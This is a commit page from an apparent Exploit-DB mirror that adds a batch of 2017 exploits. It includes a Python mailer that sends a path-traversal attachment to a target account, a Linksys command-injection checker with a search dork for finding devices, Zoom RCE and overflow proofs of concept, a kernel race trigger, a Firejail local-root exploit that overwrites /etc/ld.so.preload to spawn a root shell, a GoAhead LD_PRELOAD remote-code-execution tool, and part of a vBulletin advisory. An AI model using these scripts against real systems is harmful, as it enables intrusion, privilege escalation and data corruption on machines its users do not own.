bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-12-19

Browse source 
19 changes to exploits/shellcodes

CDex 1.96 - Buffer Overflow
Zoom Linux Client 2.0.106600.0904 - Command Injection
Zoom Linux Client 2.0.106600.0904 - Stack-Based Buffer Overflow

Firejail - Local Privilege Escalation

Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape

Linux kernel < 4.10.15 - Race Condition Privilege Escalation
Outlook for Android - Attachment Download Directory Traversal
Western Digital MyCloud - 'multi_uploadify' File Upload (Metasploit)
GoAhead httpd 2.5 < 3.6.5 - 'LD_PRELOAD' Remote Code Execution

Joomla! Component Guru Pro - SQL Injection
Joomla! Component Guru Pro - 'Itemid' SQL Injection
Joomla! Component User Bench 1.0 - 'userid' SQL Injection
Joomla! Component My Projects 2.0 - SQL Injection
vBulletin 5 - 'routestring' Unauthenticated Remote Code Execution
vBulletin 5 - 'cacheTemplates' Unauthenticated Remote Arbitrary File Deletion
Linksys WVBR0 - 'User-Agent' Remote Command Injection
Joomla! Component JB Visa 1.0 - 'visatype' SQL Injection
Joomla! Component Guru Pro - 'promocode' SQL Injection

Monstra CMS 3.0.4 - Arbitrary File Upload / Remote Code Execution
This commit is contained in:
Offensive Security 2017-12-19 05:02:17 +00:00
parent 729a1a8bbf
commit f76fbb1072
18 changed files with 1586 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

122
exploits/android/remote/43353.py Executable file
View file

@ -0,0 +1,122 @@
'''
There is a directory traversal issue in attachment downloads in Outlook for Android. There is no path sanitization on the attachment filename in the app. If the email account is a Hotmail account, this will be sanitized by the server, but for other accounts it will not be. This allows a file to be written anywhere on the filesystem that the Outlook app can access when an attached image is viewed in the Outlook app.
This bug has the following limitations:
1) the email address has to be a non-Hotmail address
2) the file can not overwrite an existing file (append happens in this case), it has to be a file that doesn't already exist.
3) the user has to click the image and view it, it is not sufficient just to view the thumbnail in the message.
It is possible to modify a database using this bug by placing a journal file in the databases directory.
Below is a PoC of an email that causes this issue. Attached is a python script that will send an email that causes this issue (don't forget to add in the to and from addresses, and your email credentials). WARNING: this PoC will cause Outlook to crash repeatedly, and you will need to re-install it to get it to work again
Content-Type: Content-Type: multipart/mixed; boundary="----714A286D976BF3E58D9D671E37CBCF7C"
MIME-Version: 1.0
Subject: hello image2adfdfs1
To: EMAIL
From: natashenka@google.com
You will not see this in a MIME-aware mail reader.
------714A286D976BF3E58D9D671E37CBCF7C
Content-Type: text/html
<html>
<body>
test
</body>
</html>
------714A286D976BF3E58D9D671E37CBCF7C
Content-Type: image/png; name="t124"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="../databases/acompli.db-journal"
2dUF+SChY9f/////AAAAABAAAAAAAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRyb2lkX21l
dGFkYXRhYW5kcm9pZF9tZXRhZGF0YQNDUkVBVEUgVEFCTEUgAAAARlkAAABFSgAAAEs7AAAASSw=
------714A286D976BF3E58D9D671E37CBCF7C
'''
import os
import sys
import smtplib
import mimetypes
from optparse import OptionParser
from email import encoders
from email.message import Message
from email.mime.audio import MIMEAudio
from email.mime.base import MIMEBase
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import subprocess
import random
def main():
FROM_ADDRESS = "YOUR FROM ADDRESS HERE"
YOUR_CREDENTIAL = "GET A GOOGLE ACCOUNT TEMPORARY PASSWORD AND PUT IT HERE"
TO_ADDRESS = "ACCOUNT TO ATTACK HERE"
composed = """Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="----714A286D976BF3E58D9D671E37CBCF7C"
MIME-Version: 1.0
Subject: hello image2adfdfs1
To: """+ TO_ADDRESS +"""
From: """ + FROM_ADDRESS + """
You will not see this in a MIME-aware mail reader.
------714A286D976BF3E58D9D671E37CBCF7C
Content-Type: text/html
<html>
<body>
test
</body>
</html>
------714A286D976BF3E58D9D671E37CBCF7C
Content-Type: image/png; name="t124"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="../databases/acompli.db-journal"
2dUF+SChY9f/////AAAAABAAAAAAAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRyb2lkX21l
dGFkYXRhYW5kcm9pZF9tZXRhZGF0YQNDUkVBVEUgVEFCTEUgAAAARlkAAABFSgAAAEs7AAAASSw=
------714A286D976BF3E58D9D671E37CBCF7C"""
s = smtplib.SMTP_SSL("smtp.gmail.com")
s.login(FROM_ADDRESS, YOUR_CREDENTIAL)
you = TO_ADDRESS
s.sendmail(FROM_ADDRESS, you, composed)
s.quit()
if __name__ == '__main__':
main()

70
exploits/hardware/webapps/43363.py Executable file
View file

@ -0,0 +1,70 @@
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Author: Nixawk
# CVE-2017-17411
# Linksys WVBR0 25 Command Injection
"""
$ python2.7 exploit-CVE-2017-17411.py
[*] Usage: python exploit-CVE-2017-17411.py <URL>
$ python2.7 exploit-CVE-2017-17411.py http://example.com/
[+] Target is exploitable by CVE-2017-17411
"""
import requests
def check(url):
payload = '"; echo "admin'
md5hash = "456b7016a916a4b178dd72b947c152b7" # echo "admin" | md5sum
resp = send_http_request(url, payload)
if not resp:
return False
lines = resp.text.splitlines()
sys_cmds = filter(lambda x: "config.webui sys_cmd" in x, lines)
if not any([payload in sys_cmd for sys_cmd in sys_cmds]):
return False
if not any([md5hash in sys_cmd for sys_cmd in sys_cmds]):
return False
print("[+] Target is exploitable by CVE-2017-17411 ")
return True
def send_http_request(url, payload):
headers = {
'User-Agent': payload
}
response = None
try:
response = requests.get(url, headers=headers)
except Exception as err:
log.exception(err)
return response
if __name__ == '__main__':
import sys
if len(sys.argv) != 2:
print("[*] Usage: python %s <URL>" % sys.argv[0])
sys.exit(0)
check(sys.argv[1])
# google dork: "Vendor:LINKSYS ModelName:WVBR0-25-US"
## References
# https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair
# https://thehackernews.com/2017/12/directv-wvb-hack.html

111
exploits/linux/dos/43354.txt Normal file
View file

@ -0,0 +1,111 @@
[CONVISO-17-003] - Zoom Linux Client Command Injection Vulnerability (RCE)
1. Advisory Information
Conviso Advisory ID: CONVISO-17-003
CVE ID: CVE-2017-15049
CVSS v2: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Date: 2017-10-01
2. Affected Components
Zoom client for Linux, version 2.0.106600.0904 (zoom_amd64.deb). Other versions may be
vulnerable.
3. Description
The binary /opt/zoom/ZoomLauncher is vulnerable to command injection because it uses user input
to construct a shell command without proper sanitization.
The client registers a scheme handler (zoommtg://) and this makes possible to trigger the
vulnerability remotely.
4. Details
gef> r '$(uname)'
Starting program: /opt/zoom/ZoomLauncher '$(uname)'
ZoomLauncher started.
cmd line: $(uname)
$HOME = /home/user
Breakpoint 5, 0x0000000000401e1f in startZoom(char*, char*) ()
gef> x/3i $pc
=> 0x401e1f <_Z9startZoomPcS_+744>: call 0x4010f0 <strcat@plt>
0x401e24 <_Z9startZoomPcS_+749>: lea rax,[rbp-0x1420]
0x401e2b <_Z9startZoomPcS_+756>: mov rcx,0xffffffffffffffff
gef> x/s $rdi
0x7fffffffbf10: "export SSB_HOME=/home/user/.zoom; export QSG_INFO=1; export
LD_LIBRARY_PATH=/opt/zoom;/opt/zoom/zoom \""
gef> x/s $rsi
0x7fffffffd750: "$(uname) "
gef> c
Continuing.
export SSB_HOME=/home/user/.zoom; export QSG_INFO=1; export
LD_LIBRARY_PATH=/opt/zoom;/opt/zoom/zoom "$(uname) "
Breakpoint 6, 0x0000000000401e82 in startZoom(char*, char*) ()
gef> x/3i $pc
=> 0x401e82 <_Z9startZoomPcS_+843>: call 0x401040 <system@plt>
0x401e87 <_Z9startZoomPcS_+848>: mov DWORD PTR [rbp-0x18],eax
0x401e8a <_Z9startZoomPcS_+851>: mov eax,DWORD PTR [rbp-0x18]
gef> x/s $rdi
0x7fffffffbf10: "export SSB_HOME=/home/user/.zoom; export QSG_INFO=1; export
LD_LIBRARY_PATH=/opt/zoom;/opt/zoom/zoom \"$(uname) \""
--- RCE POC ---
<html>
<head>
</head>
<body>
<h1>Zoom POC RCE</h1>
<script>
window.location = 'zoommtg://$(gnome-calculator${IFS}-e${IFS}1337)'
</script>
<body>
</html>
5. Solution
Upgrade to latest version.
6. Credits
Ricardo Silva <rsilva@conviso.com.br>
Gabriel Quadros <gquadros@conviso.com.br>
7. Report Timeline
Set 28, 2017 - Conviso sent first email asking for a channel to discuss the vulnerability.
Set 28, 2017 - Vendor asked the report in the current channel.
Set 28, 2017 - Conviso sent informations to reproduce the vulnerability.
Set 28, 2017 - Conviso asked if they could reproduce it.
Set 28, 2017 - Vendor replied saying that the informations were forwarded to engineering team.
Oct 5, 2017 - Vendor provided a patch candidate for testing.
Oct 5, 2017 - Conviso pointed problems in the patch.
Oct 11, 2017 - Vendor provided a patch candidate for testing.
Oct 12, 2017 - Conviso pointed problems in the patch.
Oct 23, 2017 - Conviso asked for status.
Oct 27, 2017 - Conviso asked for status.
Nov 1, 2017 - Conviso asked for status.
Nov 3, 2017 - Vendor replied.
Nov 6, 2017 - Conviso asked for status.
Nov 6, 2017 - Vendor replied.
Nov 9, 2017 - Conviso asked for status.
Nov 13, 2017 - Conviso asked for status.
Nov 15, 2017 - Conviso asked for status.
Nov 16, 2017 - Vendor provided a patch candidate for testing.
Nov 16, 2017 - The patch seems to fix the attack vector, although no further research was done.
Nov 20, 2017 - Vendor thanked and marked the issue as solved, considering the patch as a
sastifactory fix.
Nov 30, 2017 - Vendor released the version 2.0.115900.1201
8. References
https://zoom.us/download
https://support.zoom.us/hc/en-us/articles/205759689-New-Updates-for-Linux
9. About Conviso
Conviso is a consulting company specialized on application security. Our values are based on the
allocation of the adequate competencies on the field, a clear and direct speech with the market,
collaboration and partnership with our customers and business partners and constant investments
on methodology and research improvement. For more information about our company and services
provided, please check our website at www.conviso.com.br.
10. Copyright and Disclaimer
The information in this advisory is Copyright 2017 Conviso Application Security S/A and provided
so that the society can understand the risk they may be facing by running affected software,
hardware or other components used on their systems. In case you wish to copy information from
this advisory, you must either copy all of it or refer to this document (including our URL). No
guarantee is provided for the accuracy of this information, or damage you may cause your systems
in testing.

113
exploits/linux/dos/43355.txt Normal file
View file

@ -0,0 +1,113 @@
[CONVISO-17-002] - Zoom Linux Client Stack-based Buffer Overflow Vulnerability
1. Advisory Information
Conviso Advisory ID: CONVISO-17-002
CVE ID: CVE-2017-15048
CVSS v2: 6.8, (AV:N/AC:M/Au:N/C:P/I:P/A:P)
Date: 2017-10-01
2. Affected Components
Zoom client for Linux, version 2.0.106600.0904 (zoom_amd64.deb). Other versions may be
vulnerable.
3. Description
The binary /opt/zoom/ZoomLauncher is vulnerable to a buffer overflow because it concatenates a
overly long user input to a stack variable without checking if the destination buffer is long
enough to hold the data.
The binary also has important security features like canary turned off.
The client registers a scheme handler (zoommtg://) and this makes possible to trigger the
vulnerability remotely.
4. Details
gef> checksec
[+] checksec for '/opt/zoom/ZoomLauncher'
Canary : No
NX : Yes
PIE : No
Fortify : No
RelRO : Partial
gef>
gef> r $(python -c 'print "A"*1048 + "BBBBBBBB"')
Starting program: /opt/zoom/ZoomLauncher $(python -c 'print "A"*1048 + "BBBBBBBB"')
ZoomLauncher started.
Breakpoint 4, 0x00000000004025a6 in main ()
gef> x/5i $pc
=> 0x4025a6 <main+367>: call 0x4010f0 <strcat@plt>
0x4025ab <main+372>: lea rax,[rbp-0x410]
0x4025b2 <main+379>: mov rcx,0xffffffffffffffff
0x4025b9 <main+386>: mov rdx,rax
0x4025bc <main+389>: mov eax,0x0
gef> x/s $rdi
0x7fffffffd330: ""
gef> x/s $rsi
0x7fffffffdc35: 'A' <repeats 1048 times>, "BBBBBBBB"
gef> i f
Stack level 0, frame at 0x7fffffffd750:
rip = 0x4025a6 in main; saved rip = 0x7ffff7216f45
Arglist at 0x7fffffffd740, args:
Locals at 0x7fffffffd740, Previous frame's sp is 0x7fffffffd750
Saved registers:
rbp at 0x7fffffffd740, rip at 0x7fffffffd748
gef> ni
0x00000000004025ab in main ()
gef> i f
Stack level 0, frame at 0x7fffffffd750:
rip = 0x4025ab in main; saved rip = 0x4242424242424242
Arglist at 0x7fffffffd740, args:
Locals at 0x7fffffffd740, Previous frame's sp is 0x7fffffffd750
Saved registers:
rbp at 0x7fffffffd740, rip at 0x7fffffffd748
gef>
5. Solution
Upgrade to latest version.
6. Credits
Ricardo Silva <rsilva@conviso.com.br>
Gabriel Quadros <gquadros@conviso.com.br>
7. Report Timeline
Set 28, 2017 - Conviso sent first email asking for a channel to discuss the vulnerability.
Set 28, 2017 - Vendor asked the report in the current channel.
Set 28, 2017 - Conviso sent informations to reproduce the vulnerability.
Set 28, 2017 - Conviso asked if they could reproduce it.
Set 28, 2017 - Vendor replied saying that the informations were forwarded to engineering team.
Oct 5, 2017 - Vendor provided a patch candidate for testing.
Oct 5, 2017 - Conviso pointed problems in the patch.
Oct 11, 2017 - Vendor provided a patch candidate for testing.
Oct 12, 2017 - Conviso pointed problems in the patch.
Oct 23, 2017 - Conviso asked for status.
Oct 27, 2017 - Conviso asked for status.
Nov 1, 2017 - Conviso asked for status.
Nov 3, 2017 - Vendor replied.
Nov 6, 2017 - Conviso asked for status.
Nov 6, 2017 - Vendor replied.
Nov 9, 2017 - Conviso asked for status.
Nov 13, 2017 - Conviso asked for status.
Nov 15, 2017 - Conviso asked for status.
Nov 16, 2017 - Vendor provided a patch candidate for testing.
Nov 16, 2017 - The patch seems to fix the attack vector, although no further research was done.
Nov 20, 2017 - Vendor thanked and marked the issue as solved, considering the patch as a
sastifactory fix.
Nov 30, 2017 - Vendor released the version 2.0.115900.1201
8. References
https://zoom.us/download
https://support.zoom.us/hc/en-us/articles/205759689-New-Updates-for-Linux
9. About Conviso
Conviso is a consulting company specialized on application security. Our values are based on the
allocation of the adequate competencies on the field, a clear and direct speech with the market,
collaboration and partnership with our customers and business partners and constant investments
on methodology and research improvement. For more information about our company and services
provided, please check our website at www.conviso.com.br.
10. Copyright and Disclaimer
The information in this advisory is Copyright 2017 Conviso Application Security S/A and provided
so that the society can understand the risk they may be facing by running affected software,
hardware or other components used on their systems. In case you wish to copy information from
this advisory, you must either copy all of it or refer to this document (including our URL). No
guarantee is provided for the accuracy of this information, or damage you may cause your systems
in testing.

0
exploits/linux/local/41022.txt → exploits/linux/local/41022.md
View file

180
exploits/linux/local/43345.c Normal file
View file

@ -0,0 +1,180 @@
/*
* PoC for CVE-2017-10661, triggers UAF with KASan enabled in kernel 4.10
*/
#include <string.h>
#include <sys/timerfd.h>
#include <sys/time.h>
#include <sys/msg.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <errno.h>
#include <time.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#include <pthread.h>
#define RACE_TIME 1000000
int fd;
int fd_dumb;
int count=0;
void* list_add_thread(void* arg){
int ret;
struct itimerspec new ={
.it_interval={
.tv_sec=100,
.tv_nsec=100
},
.it_value={
.tv_sec=100,
.tv_nsec=100
}
};
int i=0;
while(i<1){
ret=timerfd_settime(fd,3,&new,NULL);
if(ret<0){
perror("timerfd settime failed !");
}
i++;
}
return NULL;
}
void* list_del_thread(void* arg){
int ret;
struct itimerspec new ={
.it_interval={
.tv_sec=100,
.tv_nsec=100
},
.it_value={
.tv_sec=100,
.tv_nsec=100
}
};
int i=0;
while(i<1){
ret=timerfd_settime(fd,1,&new,NULL);
if(ret<0){
perror("timerfd settime failed !");
}
i++;
}
return NULL;
}
int post_race()
{
int ret;
struct itimerspec new ={
.it_interval={
.tv_sec=100,
.tv_nsec=100
},
.it_value={
.tv_sec=100,
.tv_nsec=100
}
};
int i=0;
struct timeval tv={
.tv_sec = 120+count*2,
.tv_usec = 100
};
ret=settimeofday(&tv,NULL);
if(ret<0){
perror("settimeofday");
}
return 0;
}
int do_race(){
int ret_add[2];
int i;
int j;
pthread_t th[2]={0};
i=0;
while(i<RACE_TIME){
if(i%128)
printf("%d\n",i);
fd=timerfd_create(CLOCK_REALTIME,0); // create the victim ctx
if(fd<0){
perror("timerfd craete failed!");
return -1;
}
ret_add[0] = pthread_create(&th[0],NULL,list_add_thread,(void*)1);
ret_add[1] = pthread_create(&th[1],NULL,list_add_thread,(void*)2);
for( j=0;j<2;j++){
pthread_join(th[j],NULL);
}
close(fd);
usleep(150000);
i++;
count++;
}
return 0;
}
int main(int argc, char const *argv[])
{
int ret;
// add dumb ctx
void* area;
void* base;
struct itimerspec new ={
.it_interval={
.tv_sec=100,
.tv_nsec=100
},
.it_value={
.tv_sec=100,
.tv_nsec=100
}
};
fd_dumb = timerfd_create(CLOCK_REALTIME,0);
ret=timerfd_settime(fd_dumb,3,&new,NULL);
if(ret<0){
perror("timerfd settime failed !");
}
ret=do_race();
if(ret <0){
puts("race failed!");
goto error_end;
}
sleep(5);
error_end:
close(fd);
exit(1);
}

101
exploits/linux/local/43359.c Normal file
View file

@ -0,0 +1,101 @@
/* firejail local root exploit (host to host)
*
* (C) 2017 Sebastian Krahmer under the GPL.
*
* WARNING: This exploit uses ld.so.preload technique.
* If you are in bad luck, you may end up with an unusable system.
* SO BE WARNED. ONLY TEST IT IN YOUR SAFE VM's.
*
* Get the beauty that this is a shared lib and a running
* executable at the same time, as we tamper with /etc/ld.so.preload
*
* Therefore you have to compile it like this:
*
* $ cc -fPIC -fpic -std=c11 -Wall -pedantic -c firenail.c
* $ gcc -shared -pie firenail.o -o firenail
* $ ./firenail
*
* DO NOT TELL ME THAT SELINUX WOULD HAVE PREVENTED THIS EXPLOIT.
* IF I WAS ABOUT TO BYPASS SELINUX ALONG, I WOULD HAVE DONE THE
* EXPLOIT DIFFERENTLY.
*
* Analysis: Sandboxing is cool, but it has to be done right.
* Firejail has too broad attack surface that allows users
* to specify a lot of options, where one of them eventually
* broke by accessing user-files while running with euid 0.
* There are some other similar races. Turns out that it can be
* _very difficult_ to create a generic sandbox suid wrapper thats
* secure but still flexible enough to sandbox arbitrary binaries.
*
* Tested with latest commit 699ab75654ad5ab7b48b067a2679c544cc8725f6.
*/
#define _POSIX_C_SOURCE 200212
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/stat.h>
#include <sys/types.h>
const char *const ldso = "/etc/ld.so.preload";
int main();
__attribute__((constructor)) void init(void)
{
if (geteuid())
return;
unlink(ldso);
char *sh[] = {"/bin/sh", "--noprofile", "--norc", NULL};
setuid(0);
setgid(0);
execve(*sh, sh, NULL);
exit(1);
}
void die(const char *s)
{
perror(s);
exit(errno);
}
int main()
{
printf("[*] fire(j|n)ail local root exploit 2017\n\n");
char me[4096] = {0}, *home = getenv("HOME");
if (!home)
die("[-] no $HOME");
if (readlink("/proc/self/exe", me, sizeof(me) - 1) < 0)
die("[-] Unable to find myself");
char path[256] = {0};
snprintf(path, sizeof(path) - 1, "%s/.firenail", home);
if (mkdir(path, 0700) < 0 && errno != EEXIST)
die("[-] mkdir");
snprintf(path, sizeof(path) - 1, "%s/.firenail/.Xauthority", home);
if (symlink(ldso, path) < 0 && errno != EEXIST)
die("[-] symlink");
system("firejail --private=.firenail /usr/bin/id");
int fd = open(ldso, O_RDWR|O_TRUNC);
if (fd < 0)
die("[-] open");
write(fd, me, strlen(me));
write(fd, "\n", 1);
close(fd);
char *su[] = {"/bin/su", NULL};
execve(*su, su, NULL);
die("[-] execve su");
return -1;
}

191
exploits/linux/remote/43360.py Executable file
View file

@ -0,0 +1,191 @@
#!/usr/bin/python
# GoAhead httpd/2.5 to 3.6.5 LD_PRELOAD remote code execution exploit
# EDB Note: Payloads ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43360.zip
# EDB Note: Source ~ https://www.elttam.com.au/blog/goahead/
# EDB Note: Source ~ https://github.com/elttam/advisories/blob/c778394dfe454083ebdfb52f660fd3414ee8adb8/CVE-2017-17562/
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#+++++++++++++++++++++++++++++++++++:--/++++++++++++++++++++++++++++++++++++
#+++++++++++++++++++++++++++++++/:-......-:/++++++++++++++++++++++++++++++++
#++++++++++++++++++++++/////::-..............-:://///+++++++++++++++++++++++
#++++++++++++++++++++++..............-:..............+++++++++++++++++++++++
#++++++++++++++++++++++..........-://+++/:-..........+++++++++++++++++++++++
#++++++++++++++++++++++......://++++++++++++//::.....+++++++++++++++++++++++
#++++++++++++++++++++++......++++++++++++++++++/.....+++++++++++++++++++++++
#++++++++++++++++++++++......:/+++++++++++++++/-.....+++++++++++++++++++++++
#++++++++++++++++++++++.........--::////:::--........+++++++++++++++++++++++
#++++++++++++++++++++++-...........................:/+++++++++++++++++++++++
#++++++++++++++++++++++:.....-................--:/++++++++++++++++++++++++++
#+++++++++++++++++++++++-....-+///::::::::///+++++++++++++++++++++++++++++++
#+++++++++++++++++++++++/.....-/++++++++++++++++/::+++++++++++++++++++++++++
#++++++++++++++++++++++++/-.....-/++++++++/:--...-/+++++++++++++++++++++++++
#++++++++++++++++++++++++++:.......:/++/:.......:+++++++++++++++++++++++++++
#+++++++++++++++++++++++++++/-................-/++++++++++++++++++++++++++++
#+++++++++++++++++++++++++++++/:-..........-:/++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++/:--..--:/+++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++(c) 2017 elttam Pty Ltd.+++
# ~/goahead_exploit>>> ./makemyday.py -h
# usage: makemyday.py [-h] [--server SERVER] [--port PORT] [--maxconn {1-256}]
# [--verbose]
# {fingerprint,stage,exploit,findcgi} ...
#
# GoAhead httpd remote LD_PRELOAD exploit.
#
# positional arguments:
# {fingerprint,stage,exploit,findcgi}
# fingerprint fingerprint if GoAhead server uses CGI
# stage send a staging payload and wait indefinitely
# exploit run exploit
# findcgi brute force cgi script names
#
# optional arguments:
# -h, --help show this help message and exit
# --server SERVER target ip or hostname, default is localhost
# --port PORT target port, default is 80
# --maxconn {1-256} max concurrent requests, default is 1
# --verbose, -v increase verbosity level
#
# See https://www.elttam.com.au for more information.
# >>>./makemyday.py --server 192.168.1.24 --port 80 exploit --payload ./payloads/X86_64-hw.so
# exploit works!
import argparse
import httplib
import sys
import threading
from string import Template
class GoAheadExploit(object):
'''GoAheadExploit'''
qid = None
payload = None
exploited = False
def __init__(self):
'''Configure arguments and run the exploit'''
parser = argparse.ArgumentParser(
description="GoAhead httpd remote LD_PRELOAD exploit.",
epilog="See https://www.elttam.com.au for more information."
)
parser.add_argument('--server', default="localhost",
help='target ip or hostname, default is localhost')
parser.add_argument('--port', type=int, default=80,
help='target port, defaults is 80')
parser.add_argument('--maxconn', type=int, default=1, choices=xrange(1, 256),
metavar="{1-256}", help='max concurrent requests, default is 1')
parser.add_argument('--verbose', '-v', default=0, action='count',
help='increase verbosity level')
common_options = argparse.ArgumentParser(add_help=False)
common_options.add_argument('--cginame', default="cgitest",
help='target cgi script')
common_options.add_argument('--payload', nargs='?',
type=argparse.FileType('r'), default=sys.stdin,
help='shared object file to execute (defaults to stdin)')
cmd_subparsers = parser.add_subparsers(dest="action")
cmd_subparsers.add_parser(
'fingerprint', help='fingerprint if GoAhead server uses CGI')
cmd_subparsers.add_parser('stage', parents=[common_options],
help='send a staging payload and wait indefinitely')
cmd_subparsers.add_parser('exploit', parents=[common_options],
help='run exploit')
findcgi = cmd_subparsers.add_parser(
'findcgi', help='brute force cgi script names')
findcgi.add_argument('--wordlist', nargs='?',
type=argparse.FileType('r'), default=sys.stdin,
help='list of cgi filenames to brute force (defaults to stdin)')
# parse command line and call into action
self.args = parser.parse_args()
getattr(self, self.args.action)()
def fingerprint(self):
'''fingerprint'''
conn = httplib.HTTPConnection(self.args.server, self.args.port)
conn.connect()
conn.request(
"GET", "/cgi-bin/c8fed00eb2e87f1cee8e90ebbe870c190ac3848c")
if conn.getresponse().read().find("CGI process file does not exist") != -1:
print "CGI scripting is enabled"
else:
print "CGI scripting is disabled"
conn.close()
def findcgi(self):
'''findcgi'''
for cginame in self.args.wordlist.readlines():
cginame = cginame[:-1]
conn = httplib.HTTPConnection(self.args.server, self.args.port)
conn.connect()
conn.request("GET", "/cgi-bin/" + cginame)
resp = conn.getresponse()
if resp.status == 200:
print "/cgi-bin/" + cginame + " exists."
conn.close()
def stage(self):
'''stage'''
payload = self.args.payload.read()
headers = {"Host": self.args.server,
"User-Agent": "curl/7.51.0",
"Accept": "*/*",
"Content-Length": str(len(payload) + 1)}
conn = httplib.HTTPConnection(self.args.server, self.args.port)
conn.connect()
conn.request("POST", "/cgi-bin/" + self.args.cginame, payload, headers)
try:
conn.getresponse()
except httplib.BadStatusLine:
pass
conn.close()
def exploit(self):
'''exploit'''
for _ in range(0, self.args.maxconn):
tid = threading.Thread(self.do_exploit(verify,))
tid.start()
def do_exploit(self, verify_callback):
'''do_exploit'''
if not self.payload:
self.payload = self.args.payload.read()
contentlen = len(self.payload)
headers = {"Host": self.args.server,
"User-Agent": "curl/7.51.0",
"Accept": "*/*",
"Content-Length": str(contentlen)}
exploit_string = Template("/cgi-bin/${cginame}?LD_PRELOAD="
"/proc/self/fd/0").substitute({
"cginame": self.args.cginame
})
while not self.exploited:
conn = httplib.HTTPConnection(self.args.server, self.args.port, timeout=10)
conn.connect()
conn.request("POST", exploit_string, self.payload, headers)
try:
if verify_callback(conn.getresponse()):
self.exploited = True
print "exploit works!"
except httplib.BadStatusLine:
pass
conn.close()
# put your payload callback/verification code here
def verify(res):
'''validation callback'''
if res.getheader("hello"):
return True
return False
if __name__ == '__main__':
GoAheadExploit()

264
exploits/multiple/webapps/43361.md Normal file
View file

@ -0,0 +1,264 @@
# SSD Advisory vBulletin routestring Unauthenticated Remote Code Execution
Source: https://blogs.securiteam.com/index.php/archives/3569
## Vulnerability Summary
The following advisory describes a unauthenticated file inclusion vulnerability that leads to remote code execution found in vBulletin version 5.
vBulletin, also known as vB, is a widespread proprietary Internet forum software package developed by vBulletin Solutions, Inc., based on PHP and MySQL database server. vBulletin powers many of the largest social sites on the web, with over 100,000 sites built on it, including Fortune 500 and Alexa Top 1M companies websites and forums. According to the latest W3Techs1 statistics, vBulletin version 4 holds more than 55% of the vBulletin market share, while version 3 and 5 divide the remaining percentage
## Credit
An independent security researcher has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
## Vendor response
We tried to contact vBulletin since November 21 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerabilities.
## Vulnerability details
vBulletin contains a vulnerability that can allow a remote attacker to include any file from the vBulletin server and execute arbitrary PHP code.
An unauthenticated user is able to send a GET request to /index.php which can then trigger the file inclusion vulnerability with parameter routestring=.
The request allows an attacker to create a crafted request to Vbulletin server installed on Windows OS and include any file on the web server.
**Listing of /index.php:**
```
/* 48 */ $app = vB5_Frontend_Application::init('config.php');
/* 49 */ //todo, move this back so we can catch notices in the startup code. For now, we can set the value in the php.ini
/* 50 */ //file to catch these situations.
/* 51 */ // We report all errors here because we have to make Application Notice free
/* 52 */ error_reporting(E_ALL | E_STRICT);
/* 53 */
/* 54 */ $config = vB5_Config::instance();
/* 55 */ if (!$config->report_all_php_errors) {
/* 56 */ // Note that E_STRICT became part of E_ALL in PHP 5.4
